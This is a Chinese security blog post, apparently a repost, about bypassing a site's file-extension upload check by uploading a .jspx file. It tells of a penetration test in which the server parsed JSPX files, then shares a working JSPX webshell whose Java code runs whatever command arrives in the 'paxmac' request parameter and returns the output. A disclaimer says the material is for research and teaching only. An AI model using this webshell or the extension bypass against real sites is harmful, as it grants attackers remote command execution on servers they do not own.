上传JSPX文件绕过网站后缀名检查

独自等待 2017年5月10日20:37:24评论1,771 views字数 721阅读2分24秒阅读模式

这几天在做渗透测试的时候,发现一个有趣的东西。目标有上传漏洞,但是无论如何都没法让webshell执行。访问任何jsp文件都跳到登录的地 方,然后尝试过变换jsp的大小写,虽然不跳了,但是直接不解析,利用apache的解析漏洞上传文件,也不解析。后来只能放弃…

今天在工作中做另外一个站的渗透测试的时候,有个很特别的东西,JSPX,发现可以解析。然后去找了下是否apache默认解析jspx的文件。 qingshen大牛,直接把配置的截图发过来,瞅了下,果然是类似iis解析cer、asa这类文件,作为一个jsp的映射。后来去网上找有没有 jspx的马,结果是没有找到的说,后来无才大牛丢了一个过来,上传,解析,搞定目标。呱呱…

jspx后缀

下面共享一个jspx的一句话木马,详见代码:


    
    

    
        
            jspx
        
        
            
               try {
  String cmd = request.getParameter("paxmac");
  if (cmd !=null){
   Process child = Runtime.getRuntime().exec(cmd);
   InputStream in = child.getInputStream();
   int c;
   while ((c = in.read()) != -1) {
   out.print((char)c);
   }
   in.close();
   try {
   child.waitFor();
   } catch (InterruptedException e) {
   e.printStackTrace();
  }
  }
  } catch (IOException e) {
  System.err.println(e);
  }
            
        
    

原文转载自:http://blog.paxmac.org/?p=431



from www.waitalone.cn.thanks for it.

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
独自等待
  • 本文由 发表于 2017年5月10日20:37:24
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   上传JSPX文件绕过网站后缀名检查https://cn-sec.com/archives/50195.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息